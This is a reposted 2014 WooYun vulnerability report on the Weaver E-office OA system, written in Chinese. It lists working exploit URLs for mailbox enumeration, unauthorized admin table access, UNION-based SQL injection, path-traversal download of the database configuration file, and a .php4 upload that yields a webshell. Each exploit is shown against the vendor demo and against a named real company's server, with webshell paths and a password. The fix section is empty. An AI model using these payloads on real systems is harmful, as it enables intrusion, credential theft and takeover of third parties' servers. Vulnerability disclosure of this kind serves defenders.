记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

泛微OA漏洞集合(sql注入、未授权访问等)

2014-12-03 18:45

code 区域
0x00: 想说的一些废话



下面出现的漏洞,据我了解还没有人报过,千万别说又跟什么什么漏洞重复了(点绝对不同)!

WooYun: 泛微E-office OA管理系统# 验证其通用性:SQL注入、任意文件下载、文件上传等漏洞

这里通过(1)官方演示 (2)某一案例 来演示其通用型。

官方测试账户为 夏静,案例测试账户为 程琳。

code 区域
0x01:平行越权导致查看任意用户邮件信息



问题链接:http://www.xxx.com/general/email/new/index.php?EMAIL_ID=7

问题参数:EMAIL_ID

问题说明:遍历参数EMAIL_ID的值,可查看他人邮件信息

漏洞证明:

(1)官方演示:

http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9503

QQ图片20140903235456.jpg



http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9504

QQ图片20140903235435.jpg



(2)案例演示:

http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726155

QQ图片20140903235800.jpg



http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726152

QQ图片20140903235855.jpg



code 区域
0x02:纵向越权导致直接操作数据表



问题链接:http://www.xxoo.com/ikernel/admin/

问题说明:登录该OA系统后,可访问ikernel目录,但是系统提示“没有权限操作”,此时可直接访问ikernel/admin/目录,可对表结构及表本身进行操作。

漏洞证明:

(1)官方演示:

有些显示的是乱码或显示不清楚,为方便截图进行了全选操作

QQ图片20140904000512.jpg



QQ图片20140904000603.jpg



QQ图片20140904000631.jpg



(2)案例演示:

QQ图片20140904001020.jpg



QQ图片20140904001037.jpg



QQ图片20140904001049.jpg



code 区域
0x03:纵向越权导致的SQL注入漏洞



问题链接:http://www.xxx.com/ikernel/admin/IK_TABLE/field/?TABLE_ID=9

问题参数:TABLE_ID

问题说明:这里貌似好多都存在注入,测试中只选取一点。虽gpc为on,但是数字型的不影响。

漏洞证明:

(1)官方演示:

获取数据库当前用户 http://eoffice8.weaver.cn:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()

QQ图片20140904001650.jpg



获取当前数据库名称 http://eoffice8.weaver.cn:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()

QQ图片20140904001708.jpg



(2)案例演示:

获取数据库当前用户 http://www.sjd-logistics.com:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()

QQ图片20140904001852.jpg



获取当前数据库名称 http://www.sjd-logistics.com:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()

QQ图片20140904001908.jpg



code 区域
0x04:文件下载漏洞



问题链接:http://www.xxx.com/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php

问题说明:下载是个zend加密的文件,可在网上进行解密。该文件中包含数据库链接文件。测试发现官方的已不是加密文件。

(1)官方演示:

http://eoffice8.weaver.cn:8028/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php

QQ图片20140904002813.jpg



(2)案例演示:

http://www.sjd-logistics.com:8000/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php

QQ图片20140904002848.jpg



code 区域
0x05:文件上传导致任意代码执行



问题链接:http://www.xxx.com/general/email/

问题说明:在【内部邮件】-【新建邮件】的附件处,可上传php4文件类型(官方demo中抓包改包可上传php4文件),通过查看源码找到对应的部分文件路径。最后webshell访问路径为 http://www.xxx.com/attachment/源码中找到的部分路径/文件名.php4

(1)官方演示:

得到的webshell地址为:http://eoffice8.weaver.cn:8028/attachment/1915193417/conf1g.php4 密码8

QQ图片20140904003949.jpg



QQ图片20140904004111.jpg



(2)案例演示:

得到的webshell地址为:http://www.sjd-logistics.com:8000/attachment/950753027/conf1g.php4 密码8

QQ图片20140904004308.jpg



QQ图片20140904004359.jpg

漏洞证明:

同上

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2014-074972

阅读:340688 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“泛微OA漏洞集合(sql注入、未授权访问等)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云